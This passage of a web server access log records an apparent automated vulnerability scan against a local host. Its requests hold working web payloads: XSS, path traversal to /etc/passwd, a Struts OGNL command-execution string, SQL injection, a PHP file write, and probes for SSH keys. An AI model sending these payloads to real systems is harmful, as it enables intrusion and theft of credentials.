HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/portalhelp/en/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/js/magmi_utils.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.127","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"29N5mCubYR0mB6esHuGErSHcsRe.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/29N5mCubYR0mB6esHuGErSHcsRe.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/empty/search/results?limit=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2229N5m78j9kfWdXzoz6eidmkf5c4.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29N5m63ISMRLtphn9qoEQ4vu91J/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh 